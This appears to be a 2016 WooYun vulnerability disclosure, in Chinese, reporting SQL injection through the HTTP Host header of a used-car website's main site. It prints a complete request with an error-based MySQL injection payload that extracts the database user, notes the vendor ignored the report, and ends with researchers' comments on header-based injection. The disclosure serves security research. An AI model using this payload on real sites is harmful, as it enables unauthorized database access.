有壹手汽车主站存在SQL注入漏洞(ROOT权限)

GET / HTTP/1.1
 Host: 'and(select 1 from(select count(*),concat((select concat(user()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'
 Cookie: fs_think_template=%22kmw%22; PHPSESSID=0qlf7d9np2ugdjf4363qamqmv6
 Connection: Keep-alive
 Accept-Encoding: gzip,deflate
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
 Accept: */*

使用burp，填上域名和端口：

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2016-03-24 23:40

厂商回复：

漏洞Rank：15 (WooYun评价)

最新状态：

暂无

1. 2016-03-24 23:47 | goubuli ( 普通白帽子 | Rank:689 漏洞数:122 )

   1

   卧槽，这也能注？难道没有破坏数据包？

   1# 回复此人

2. 2016-03-25 08:14 | Moonbow ( 实习白帽子 | Rank:87 漏洞数:28 | 我就是个渣渣)

   1

   学习了

   2# 回复此人

3. 2016-03-25 08:48 | 带我玩 ( 路人 | Rank:16 漏洞数:8 | 带我玩)

   1

   这是什么高深的注入方法?

   3# 回复此人

4. 2016-03-25 09:14 | k0_pwn ( 普通白帽子 | Rank:202 漏洞数:17 | 专注且自由)

   1

   楼上都不清楚吗？HTTP头很多字段都是有可能有注入的，cookie就不说了，referer什么的都有可能有注入。。

   4# 回复此人

5. 2016-03-25 09:17 | 夏殇 ( 实习白帽子 | Rank:44 漏洞数:26 | 不忘初心，方得始终。)

   1

   哈哈，第一次看到host注入的，之前只看过cookie，X-forwarded

   5# 回复此人

6. 2016-03-25 10:31 | 。帅东。 ( 路人 | Rank:18 漏洞数:4 )

   1

   学习下，洞主如何挖到的，手工测的？

   6# 回复此人

7. 2016-03-25 11:20 | 这只猪 ( 路人 | Rank:24 漏洞数:6 | )(2009年荣获CCAV首届挖洞大使称号)(★★★...)

   1

   学习了！！！

   7# 回复此人

8. 2016-03-25 15:44 | 立志成为厨神的男人 ( 路人 | Rank:15 漏洞数:1 | 我饿了)

   1

   原来HOST也能注 惊呆

   8# 回复此人

9. 2016-03-25 17:46 | js2012 ( 普通白帽子 | Rank:126 漏洞数:44 | 闭关修炼。。。)

   1

   很正常啊。。。。。。。。。。。。

   9# 回复此人

10. 2016-03-25 19:31 | Erised ( 路人 | Rank:8 漏洞数:4 | ../../../../../../../../../../../../../....)

    1

    学到了~

    10# 回复此人

11. 2016-04-05 10:02 | xsser_w ( 普通白帽子 | Rank:116 漏洞数:34 | 哎)

    1

    是不是不对阿 应该400错误阿

    11# 回复此人

12. 2016-05-09 23:13 | 不知道2017 ( 实习白帽子 | Rank:38 漏洞数:9 | 专注信息安全领域)

    0

    网站在编写程序的时候判断了host字段和数据的匹配，没有过滤被利用了。 一般一个网站就一个域名，但是有些网站一个网站程序需要自动生成很多子域名，程序通过读取host的不同子域名从数据库生成对应不同页面，没做好过滤就被sql注入了

    12# 回复此人